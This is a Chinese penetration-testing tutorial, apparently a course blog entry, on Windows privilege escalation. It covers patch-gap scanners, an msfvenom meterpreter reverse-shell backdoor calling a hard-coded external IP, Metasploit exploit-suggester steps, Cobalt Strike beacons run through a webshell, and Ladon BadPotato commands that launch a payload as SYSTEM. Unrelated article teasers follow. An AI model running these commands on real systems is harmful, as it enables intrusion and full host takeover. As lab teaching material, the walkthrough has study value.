第98天:权限提升-WIN 全平台MSF 自动化CS 插件化EXP 筛选溢出漏洞

目录

思维导图

前置知识

案例一: Web&Win2008-人工手动&全自动msf-筛选&下载&利用

手动

全自动msf

案例二: Web&Win2019-CS 半自动-反弹&插件&利用


思维导图

前置知识

提权方式,这里讲的是溢出漏洞

windows权限

常见步骤:

信息收集--操作系统版本  漏洞补丁  位数  杀软防护  网络  当前权限
可能用到的命令

ver 

systeminfo 

whoami

netstat -an

tasklist /svc

基于补丁和系统版本的位数来进行筛选可用于溢出漏洞exp

-基于手动的提权

-基于cs的半自动提权

-基于msf的全自动化提权

上传exp调用执行去提权

案例一: Web&Win2008-人工手动&全自动msf-筛选&下载&利用

手动

手工测试会有各种原因,例如开发语言,系统环境等虽然漏洞有,但是不能成功

首先是已经上传完了文件

哥斯拉连接目前的用户身份是iis

查看基础信息

然后需要进行未打补丁漏洞的筛选

项目一: GitHub - chroblert/WindowsVulnScan

把该项目中的ps1文件上传到服务器,用powershell运行

利用powershell执行,正常情况下这里已经输出了json文件

但是这里有bug,如何解决?

直接打开文件把信息手动填写进去到json文件当中

json文件需要导入到文件夹下利用python文件去执行

这里就会导出没有打补丁的漏洞编号

项目二:GitHub - vulmon/Vulmap: Vulmap Online Local Vulnerability Scanners Project

该项目对于linux的适配性更高,windows无效,这里也不做过多赘述

项目三:GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation

直接把webshell里面执行的systeminfo里面的内容全选复制到1.txt文件下

利用wes.py文件执行

结果会保存到表格当中

一个windows提权辅助平台:提权辅助网页 Windows提权辅助

页面下面这届会有结果

提权漏洞的exp项目如何寻找:

针对于提权的项目:(可惜已经不更新了)

https://github.com/Ascotbe/KernelHub  

该项目会监控git上所有exp以及poc

GitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

 下面就是找到对应exp进行提权

全自动msf

首先生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=106.14.195.29 LPORT=3333 -f exe -o msf.exe

上传到服务器

这个时候msf需要开启监听

use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit

run运行开启监听

运行exe,成功反弹shell(这里如果你是直接在系统中点的获得的是admin权限,真实环境只能用webshell去执行所以获得的是iis权限)

筛选exp模块(这里使用全自动模块)

use post/windows/gather/enum_patches(半自动:根据漏洞编号找出系统中安装的补丁)
use post/multi/recon/local_exploit_suggester(全自动:快速识别系统中可能被利用的漏洞)
background
show options
set session 1
set showdescription true
exploit

执行结果yes代表可以利用的模块

这里利用的是

这里明明有会话,但是不能创建会话,试了很多种方法也没有成功,这里先学习思路把视频中2012也未成功,学习思路即可

有时候反弹不回来可以新开一个窗口,开启监听

案例二: Web&Win2019-CS 半自动-反弹&插件&利用

cs-kali安装

首先部署cs后渗透工具,解压后,启动团队服务

新开窗口启动客户端(密码是刚才设置的,用户名随机)

开启监听

新建一个监听模块

生成后门

生成的后门上传到服务器

利用webshell去执行

cs中上线

需要去加载插件

ladon下载git地址:https://github.com/k8gege/Ladon

下面是我用的,可直接下载,永久有效哦

链接:https://pan.baidu.com/s/1rcsfdojccey-wPrHcx8A2g?pwd=i900
提取码:i900

需要先把sleep改成0秒,默认60秒是为了防止杀毒软件等

进入命令行界面

这里用的提权模块是badpotapo

但是直接点了没什么反应,需要借助命令行

Ladon badpotapo whoami

这里能够提权成功 ,但是只是临时的

这里需要利用这个模块去执行,系统下的反弹shell文件,弹回来的就是system权限

Ladon badpotato "C:\inetpub\wwwroot\artifact.exe"

点击这个按钮可以查看视图

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/659198.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

实时合成 1 秒频订单簿快照:DolphinDB INSIGHT 行情插件与订单簿引擎应用

INSIGHT 是华泰证券依托大数据存储、实时分析等领域的技术积累,整合接入国内多家交易所高频行情数据,为投资者提供集行情接入、推送、回测、计算及分析等功能于一体的行情数据服务解决方案。基于 INSIGHT 官方提供的行情数据服务 C SDK(TCP 版…

HTML静态网页成品作业(HTML+CSS)——动漫海贼王介绍网页(1个页面)

🎉不定期分享源码,关注不丢失哦 文章目录 一、作品介绍二、作品演示三、代码目录四、网站代码HTML部分代码 五、源码获取 一、作品介绍 🏷️本套采用HTMLCSS,未使用Javacsript代码,共有1个页面。 二、作品演示 三、代…

超分论文走读

codeFormer 原始动机 高度不确定性,模糊到高清,存在一对多的映射纹理细节丢失人脸身份信息丢失 模型实现 训练VQGAN 从而得到HQ码本空间作为本文的离散人脸先验。为了降低LQ-HQ映射之间的不确定性,我们设计尽量小的码本空间和尽量短的Code…

人人都是产品经理,尼恩产品经理面试宝典(史上最全、定期更新)

《人人都是产品经理,尼恩产品经理面试宝典》(史上最全、定期更新) 本文版本说明:V1 IT不老新物种 的定义 大龄男IT :APM 架构经理 项目经理 高级开发,没有中年危机 大龄女IT:DPM 产品经理 …

Simulink从0搭建模型07-P8for循环的使用

Simulink从0搭建模型07-P8for循环的使用 今日学习内容1. For Iterator Subsystem模块介绍1.1. 累加器1.2. For Iterator1.3.小结 2. states介绍3. Set next i(相当break)学习心得 今日学习内容 b站视频 【Simulink 0基础入门教程 P8 for循环的使用 For Itrator Sub…

Power Bi 自定义进度条,圆角框,矩阵图标的实现

最近项目在做Power BI,我总结了几个常用的自定义样式,分享一下做法。 比如我们要实现如图这样的一个样式: 这包含了一个带文字的自定义进度条,矩阵有树型展开以及图标显示,最外面有圆角框包围。我觉得这几个样式出现…

ATA-2021B高压放大器在锂电池超声检测中的应用

锂电池一种高能量密度的电池,已经广泛应用于可穿戴设备、移动电话、笔记本电脑和电动汽车等领域中。然而,其在使用过程中存在着一定的安全隐患,锂电池内部的化学反应和充放电过程可能会导致电池发热,甚至发生燃烧。Aigtek安泰电子…

走进数字艺术的世界:一种创新的艺术表达方式

进入数字时代,计算机将我们生活的方方面面都进行了转化。当然艺术领域也不例外。随着数字技术和计算机程序的发展和普及,“数字艺术”的概念应试而生。那么,所谓的数字艺术到底是什么呢?数字艺术的作用是什么?新手如何…

在项目中集成Web端数据库操作:推荐工具一览

在项目中集成Web端数据库操作:推荐工具一览 博主猫头虎的技术世界 🌟 欢迎来到猫头虎的博客 — 探索技术的无限可能! 专栏链接: 🔗 精选专栏: 《面试题大全》 — 面试准备的宝典!《IDEA开发秘籍…

基于分块贝叶斯非局部均值优化(OBNLM)的图像去噪算法matlab仿真

目录 1.程序功能描述 2.测试软件版本以及运行结果展示 3.核心程序 4.本算法原理 4.1 块定义与相似度计算 ​4.2 贝叶斯框架下的加权融合 4.3 加权最小均方误差估计 5.完整程序 1.程序功能描述 基于分块贝叶斯非局部均值优化(OBNLM)的图像去噪算法matlab仿真&#xff0c…

CASS+arcgis实现图斑的分割

1、在CASS中将图形绘制好,待分割图形为闭合线,使用线段将其分割成很多块,如下: 2、保存文件。打开arcgisPro,加载dwg图形,如下: 效果如下: 3、分别将面和线导出,如下&…

FL Studio21.2.5中文版电子音乐制作的强大工具

在当今的数字音乐时代,电子音乐已经成为了全球音乐市场中不可或缺的一部分。越来越多的音乐爱好者开始尝试自己动手创作电子音乐,而FL Studio 21中文版正是为他们量身打造的一款强大工具。作为一个音频制作爱好者,我深知一个好的数字音频工作…

LeetCode热题100 Day1——双指针

双指针 移动零11. 盛最多水的容器 移动零 思路: 双指针i,j,j指针遍历数组,i指针存放非0元素。遍历结束后,i指针及其后面的一定是0,就再将空出来的位置设置为0 移动零 class Solution {public void moveZeroes(int[] …

PPT忘记保存?教你如何轻松恢复

在日常办公中PPT文件作为主流文档格式,承载着我们大量的工作成果。然而当不小心误点了“不保存”按钮,或是遭遇软件崩溃等意外情况导致文档丢失时,文件内容是否还能够能恢复,往往成为我们最关心的问题。本文将为您提供五大免费且实…

Centos安装nvm管理node版本(让安装变得可控又快捷)

Centos安装nvm管理node版本(让安装变得可控又快捷) 没有找到一个对的人,有可能是你没有走对那条路,也有可能是你没有睁开眼睛,而更大的可能是,你根本就没有出发去找。 安装说明 nvm安装目录:/us…

vue项目出现多次ElMessage

问题: 解决方法: let message null if (message null) { message ElMessage.error(“登录过期,请重新登录”); } 最终效果:只出现一个弹框

N进制计数器【02】

大容量N进制计数器 集成计数器容量的扩展 集成计数器级联扩展容量 【例1】由两片 74LS161 级联组成 256 进制(8位二进制)同步加法计数器 【解】级联时,外加时钟信号同时接到各片计数器的时钟输入端,用前级计数器的进位输出 C…

蓝硕硬盘数据恢复方法详解:安全、高效的解决方案

在数字化时代,硬盘作为我们存储和传输数据的重要载体,其数据安全性显得尤为重要。然而,无论是由于误操作、硬件故障还是病毒攻击,硬盘数据丢失的风险始终存在。蓝硕硬盘作为市场上的一款知名产品,其数据恢复同样是我们…

突破空间限制,这些远程控制软件为父母送上“手把手”的教导,解决异地办公难题,出差无忧

在现代社会,科技的飞速发展带来了诸多便利,但同时也给一些年长的父母们带来了困扰。 当父母们面对智能手机电脑等高科技产品时,他们往往感到无所适从,而子女们忙于工作、学习或其他原因,常常无法时刻陪伴在父母身边&a…

【Unity iOS打包】Library not loaded: ‘@rpath/AdjustSdk.framework/AdjustSdk‘

Unity打包iOS,XCode运行App黑屏卡死,报错: dyld[8412]: Library not loaded: rpath/AdjustSdk.framework/AdjustSdkReferenced from: /private/var/containers/Bundle/Application/C019F943-138F-4B33-AAC1-F18453F942D9/AnimalsBAMBAM.app/…